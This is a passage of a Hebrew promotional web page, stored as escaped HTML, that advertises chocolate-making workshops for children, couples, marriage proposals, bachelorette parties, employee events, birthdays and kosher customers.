\\u05d0\\u05ea \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05de\\u05dc\\u05d0, \\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05d4 \\u05e9\\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05d5\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05db\\u05d0\\u05d7\\u05d3, \\u05d5\\u05dc\\u05e9\\u05de\\u05d5\\u05d7 \\u05d1\\u05ea\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05de\\u05e9\\u05d5\\u05ea\\u05e4\\u05d9\\u05dd \\u05e9\\u05d4\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd, \\u05d2\\u05df \\u05e2\\u05d3\\u05df \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd<\\/h2><p>\\u05d9\\u05e9 \\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05d4\\u05dd \\u05d0\\u05d4\\u05d1\\u05d4 \\u05d2\\u05d3\\u05d5\\u05dc\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05de\\u05d8\\u05d1\\u05d7. \\u05d4\\u05dd \\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e2\\u05de\\u05d5\\u05d3 \\u05dc\\u05e6\\u05d3 \\u05d4\\u05d4\\u05d5\\u05e8\\u05d9\\u05dd, \\u05dc\\u05e9\\u05d7\\u05e7 \\u05e2\\u05dd \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d5\\u05de\\u05d0\\u05ea\\u05d2\\u05e8\\u05d9\\u05dd \\u05d0\\u05ea \\u05e2\\u05e6\\u05de\\u05dd \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05e2\\u05e6\\u05de\\u05d0\\u05d9. \\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05de\\u05d5\\u05e6\\u05d0\\u05d9\\u05dd \\u05d0\\u05d4\\u05d1\\u05d4 \\u05d2\\u05d3\\u05d5\\u05dc\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d0\\u05d5\\u05d3 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd. \\u05d0\\u05dd \\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d0\\u05d5 \\u05d1\\u05ea \\u05de\\u05e6\\u05d5\\u05d5\\u05d4 \\u05e9\\u05de\\u05ea\\u05e7\\u05e8\\u05d1\\u05ea, \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d9\\u05ea\\u05d9\\u05ea \\u05db\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea, \\u05d5\\u05dc\\u05d0\\u05e8\\u05d2\\u05df \\u05dc\\u05d9\\u05dc\\u05d3 \\u05e9\\u05dc\\u05db\\u05dd \\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05d9\\u05e9\\u05db\\u05d7.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea, \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd<\\/h2><p>\\u05d1\\u05e0\\u05d9 \\u05d6\\u05d5\\u05d2 \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05dc\\u05d9\\u05e6\\u05d5\\u05e8 \\u05d9\\u05d7\\u05d3, \\u05e9\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e2\\u05de\\u05d5\\u05d3 \\u05d9\\u05d7\\u05d3 \\u05d1\\u05de\\u05d8\\u05d1\\u05d7, \\u05dc\\u05e4\\u05e0\\u05e7 \\u05d0\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e9\\u05e0\\u05d9 \\u05d1\\u05de\\u05d8\\u05e2\\u05de\\u05d9\\u05dd, \\u05d5\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05dc\\u05e2\\u05e6\\u05de\\u05dd \\u05d0\\u05e8\\u05d5\\u05d7\\u05d5\\u05ea \\u05de\\u05d5\\u05e9\\u05e7\\u05e2\\u05d5\\u05ea \\u05d5\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05e4\\u05e0\\u05e7\\u05d9\\u05dd, \\u05d5\\u05d3\\u05d0\\u05d9 \\u05d9\\u05de\\u05e6\\u05d0\\u05d5 \\u05e2\\u05e0\\u05d9\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea.<\\/p><p>\\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d1\\u05e0\\u05d5\\u05d9\\u05d4 \\u05db\\u05da \\u05e9\\u05ea\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05e9\\u05dc\\u05dc \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd, \\u05ea\\u05dc\\u05de\\u05d3\\u05d5 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d6\\u05d4, \\u05e2\\u05dc \\u05d4\\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05e9\\u05dc\\u05d5 \\u05d5\\u05e2\\u05dc \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05d4\\u05d8\\u05e2\\u05dd \\u05d5\\u05d4\\u05d0\\u05e8\\u05d5\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d4\\u05d5\\u05e6\\u05d9\\u05d0 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05d9\\u05dd. <br \\/>\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd \\u05de\\u05d5\\u05e9\\u05d7\\u05ea\\u05d9\\u05dd \\u05d5\\u05de\\u05e4\\u05e0\\u05e7\\u05d9\\u05dd \\u05d9\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2 \\u05e9\\u05ea\\u05dc\\u05de\\u05d3 \\u05d0\\u05d5\\u05ea\\u05dd \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d4\\u05db\\u05d9 \\u05de\\u05d8\\u05e8\\u05d9\\u05e4\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9.\\u00a0<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4, \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d1\\u05de\\u05d9\\u05e0\\u05d4<\\/h2><p>\\u05d0\\u05d7\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05d4\\u05d9\\u05d0 \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4. <br \\/>\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e8\\u05d1\\u05d9\\u05dd \\u05d1\\u05d5\\u05d7\\u05e8\\u05d9\\u05dd \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d0\\u05ea \\u05d4\\u05d9\\u05d5\\u05dd \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05d4\\u05d6\\u05d4 \\u05d1\\u05d3\\u05e8\\u05da \\u05e7\\u05e6\\u05ea \\u05e4\\u05d7\\u05d5\\u05ea \\u05e9\\u05d9\\u05d2\\u05e8\\u05ea\\u05d9\\u05ea \\u05d5\\u05d4\\u05e8\\u05d1\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9\\u05ea.<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05d4\\u05d9\\u05d0 \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05e4\\u05e0\\u05e7\\u05ea, \\u05de\\u05ea\\u05d5\\u05e7\\u05d4 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05de\\u05d5\\u05e9\\u05d7\\u05ea\\u05ea, \\u05d5\\u05de\\u05ea\\u05d1\\u05e1\\u05e1\\u05ea \\u05db\\u05d5\\u05dc\\u05d4 \\u05e2\\u05dc \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05dd \\u05d5\\u05de\\u05e2\\u05d5\\u05e8\\u05e8\\u05d9 \\u05ea\\u05d0\\u05d1\\u05d4. \\u05ea\\u05dc\\u05de\\u05d3\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8, \\u05d5\\u05d4\\u05db\\u05dc \\u05d1\\u05d0\\u05d5\\u05d5\\u05d9\\u05e8\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05de\\u05e4\\u05e0\\u05e7\\u05ea.<\\/p><h2>\\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d4\\u05e6\\u05e2\\u05d4 \\u05de\\u05ea\\u05d5\\u05e7\\u05d4 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3<\\/h2><p>\\u05de\\u05d9 \\u05de\\u05db\\u05dd \\u05e9\\u05de\\u05d7\\u05e4\\u05e9 \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05d4\\u05e6\\u05e2\\u05d5\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea, \\u05de\\u05d5\\u05d6\\u05de\\u05df \\u05dc\\u05ea\\u05db\\u05e0\\u05df \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. <br \\/>\\u05d9\\u05e9\\u05e0\\u05df \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05d3\\u05e8\\u05db\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea \\u05dc\\u05d4\\u05e6\\u05d9\\u05e2 \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df, \\u05d5\\u05db\\u05dc \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d4\\u05d9\\u05d0 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea, \\u05d0\\u05d1\\u05dc \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05de\\u05d4\\u05dc\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d0\\u05d5 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05db\\u05e9\\u05d4\\u05d8\\u05d1\\u05e2\\u05ea \\u05e6\\u05e6\\u05d4 \\u05e4\\u05ea\\u05d0\\u05d5\\u05dd \\u05de\\u05ea\\u05d5\\u05da \\u05d0\\u05d7\\u05d3 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd, \\u05d4\\u05d9\\u05d0 \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05de\\u05d7\\u05d5\\u05d5\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05e9\\u05dc\\u05d0 \\u05ea\\u05e9\\u05db\\u05d7 \\u05dc\\u05e2\\u05d5\\u05dc\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05de\\u05d3\\u05dc\\u05d9\\u05e7\\u05d4 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea<\\/h2><p>\\u05d0\\u05dd \\u05d0\\u05ea\\u05df \\u05e2\\u05d5\\u05de\\u05d3\\u05d5\\u05ea \\u05dc\\u05d4\\u05ea\\u05d7\\u05ea\\u05df \\u05de\\u05de\\u05e9 \\u05d1\\u05e7\\u05e8\\u05d5\\u05d1, \\u05d5\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d4\\u05d8\\u05d5\\u05d1\\u05d5\\u05ea, \\u05d4\\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc\\u05db\\u05df \\u05d1\\u05d8\\u05d7 \\u05ea\\u05e9\\u05dc\\u05d1 \\u05e7\\u05e6\\u05ea \\u05d0\\u05dc\\u05db\\u05d5\\u05d4\\u05d5\\u05dc, \\u05d0\\u05d5\\u05db\\u05dc \\u05d5\\u05d4\\u05e8\\u05d1\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05de\\u05ea\\u05d5\\u05e7 \\u05dc\\u05de\\u05e6\\u05d1 \\u05e8\\u05d5\\u05d7 \\u05d8\\u05d5\\u05d1.<\\/p><p>\\u05d0\\u05d6 \\u05de\\u05d4 \\u05d3\\u05e2\\u05ea\\u05db\\u05df \\u05dc\\u05e7\\u05d7\\u05ea \\u05d0\\u05ea \\u05d4\\u05e8\\u05e2\\u05d9\\u05d5\\u05df \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05e6\\u05e2\\u05d3 \\u05d0\\u05d7\\u05d3 \\u05e7\\u05d3\\u05d9\\u05de\\u05d4, \\u05d5\\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05de\\u05d3\\u05dc\\u05d9\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd, \\u05d5\\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d1\\u05d9\\u05e7\\u05d5\\u05dd \\u05d1\\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05db\\u05dc \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05dc\\u05e4\\u05e0\\u05d9 \\u05d4\\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc \\u05d4\\u05d7\\u05ea\\u05d5\\u05e0\\u05d4. \\u05d4\\u05e7\\u05dc\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea \\u05dc\\u05d0 \\u05e0\\u05e1\\u05e4\\u05e8\\u05d5\\u05ea \\u05d1\\u05e2\\u05e8\\u05d1 \\u05e9\\u05db\\u05d6\\u05d4.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd, \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d2\\u05d1\\u05e9\\u05ea \\u05d5\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea<\\/h2><p>\\u05de\\u05e0\\u05d4\\u05dc\\u05d9\\u05dd \\u05e8\\u05d1\\u05d9\\u05dd \\u05de\\u05d5\\u05e6\\u05d0\\u05d9\\u05dd \\u05d0\\u05ea \\u05e2\\u05e6\\u05de\\u05dd \\u05e9\\u05d5\\u05d1\\u05e8\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e8\\u05d0\\u05e9 \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05dc\\u05d2\\u05d1\\u05d9 \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05d9\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd. <br \\/>\\u05e2\\u05e8\\u05d1\\u05d9 \\u05e6\\u05d5\\u05d5\\u05ea \\u05d5\\u05e6\\u05f3\\u05d5\\u05e4\\u05e8\\u05d9\\u05dd \\u05e9\\u05d5\\u05e0\\u05d9\\u05dd \\u05d4\\u05e4\\u05db\\u05d5 \\u05e4\\u05d5\\u05e4\\u05d5\\u05dc\\u05d0\\u05e8\\u05d9\\u05d9\\u05dd \\u05de\\u05d0\\u05d5\\u05d3 \\u05d1\\u05e9\\u05e0\\u05d9\\u05dd \\u05d4\\u05d0\\u05d7\\u05e8\\u05d5\\u05e0\\u05d5\\u05ea, \\u05db\\u05d0\\u05e9\\u05e8 \\u05d4\\u05e8\\u05e6\\u05d5\\u05df \\u05dc\\u05e9\\u05de\\u05d7 \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d5\\u05dc\\u05d4\\u05e4\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05dd \\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e2\\u05d5\\u05de\\u05d3 \\u05d1\\u05de\\u05e8\\u05db\\u05d6.<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d4\\u05d9\\u05d0 \\u05e8\\u05e2\\u05d9\\u05d5\\u05df \\u05e0\\u05d4\\u05d3\\u05e8 \\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d2\\u05d1\\u05e9\\u05ea, \\u05dc\\u05e9\\u05d1\\u05d9\\u05e8\\u05ea \\u05d3\\u05d9\\u05e1\\u05d8\\u05e0\\u05e1 \\u05e2\\u05dd \\u05d4\\u05de\\u05e0\\u05d4\\u05dc\\u05d9\\u05dd \\u05d4\\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05d5\\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05e6\\u05d7\\u05d9\\u05e7\\u05d4 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea, \\u05e9\\u05ea\\u05d5\\u05e6\\u05d9\\u05d0 \\u05de\\u05db\\u05dd \\u05d5\\u05de\\u05d4\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05e6\\u05d3\\u05d3\\u05d9\\u05dd \\u05e9\\u05dc\\u05d0 \\u05d4\\u05db\\u05e8\\u05ea\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d7\\u05d2\\u05d9\\u05d2\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3<\\/h2><p>\\\"\\u05d0\\u05d9\\u05df \\u05d7\\u05d2\\u05d9\\u05d2\\u05d4, \\u05d1\\u05dc\\u05d9 \\u05e2\\u05d5\\u05d2\\u05d4\\\" \\u05de\\u05e1\\u05e4\\u05e8 \\u05dc\\u05e0\\u05d5 \\u05d4\\u05e9\\u05d9\\u05e8 \\u05d4\\u05de\\u05e4\\u05d5\\u05e8\\u05e1\\u05dd, \\u05d0\\u05d1\\u05dc \\u05d1\\u05d8\\u05d7 \\u05e9\\u05d0\\u05d9\\u05df \\u05d7\\u05d2\\u05d9\\u05d2\\u05ea \\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d1\\u05dc\\u05d9 \\u05de\\u05dc\\u05da \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd - \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.<br \\/>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d4\\u05d9\\u05d0 \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d5\\u05de\\u05d4\\u05e0\\u05d4 \\u05dc\\u05db\\u05dc \\u05d4\\u05d7\\u05d5\\u05d2\\u05d2\\u05d9\\u05dd. \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d8\\u05d5\\u05d1 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05dc\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d2\\u05d4 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05d4\\u05e8\\u05d9 \\u05d1\\u05d8\\u05d7 \\u05ea\\u05e9\\u05d9\\u05de\\u05d5 \\u05db\\u05db\\u05d9\\u05d1\\u05d5\\u05d3 \\u05e2\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea \\u05de\\u05dc\\u05d0\\u05d5\\u05ea \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05d5\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05dc\\u05d0 \\u05e4\\u05e9\\u05d5\\u05d8 \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05db\\u05dc \\u05d0\\u05dc\\u05d5 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05db\\u05dc \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d9\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e6\\u05d0\\u05ea \\u05e2\\u05dd \\u05de\\u05dc\\u05d0\\u05d9 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d9\\u05e1\\u05e4\\u05d9\\u05e7 \\u05d2\\u05dd \\u05dc\\u05e7\\u05e4\\u05d4 \\u05e9\\u05dc \\u05d4\\u05d1\\u05d5\\u05e7\\u05e8 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05e9\\u05e8\\u05d4<\\/h2><p>\\u05d0\\u05dc\\u05d5 \\u05de\\u05db\\u05dd \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d9\\u05dd \\u05dc\\u05d3\\u05ea, \\u05d5\\u05de\\u05e2\\u05d5\\u05e0\\u05d9\\u05d9\\u05e0\\u05d9\\u05dd \\u05dc\\u05d4\\u05e9\\u05ea\\u05ea\\u05e3 \\u05d2\\u05dd \\u05d4\\u05dd \\u05d1\\u05d7\\u05d2\\u05d9\\u05d2\\u05d9\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d2\\u05d3\\u05d5\\u05dc\\u05d4, \\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05d1\\u05d7\\u05d5\\u05e8 